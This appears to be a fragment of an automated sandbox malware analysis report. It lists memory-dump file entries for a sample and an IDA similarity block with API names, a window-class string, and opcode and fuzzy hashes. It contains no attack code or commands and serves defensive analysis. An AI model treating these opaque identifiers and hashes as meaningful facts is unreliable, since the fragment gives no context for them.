                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FindMessagePostSleepWindow
                              • String ID: Shell_TrayWnd
                              • API String ID: 529655941-2988720461
                              • Opcode ID: fc7eaf939902fa373221c725bb8ebd8ac5d4c94c2ae5ed4eb9be91995ae3f1ea
                              • Instruction ID: 69768db888d204c9ba44512c0e60646d8f69253fe9842540a7e1f07351a193db
                              • Opcode Fuzzy Hash: fc7eaf939902fa373221c725bb8ebd8ac5d4c94c2ae5ed4eb9be91995ae3f1ea
                              • Instruction Fuzzy Hash: 8ED0A93139C300BAE338AB70AC1BFA32A14AB00B04F000828B245AA0D0C8E05900D640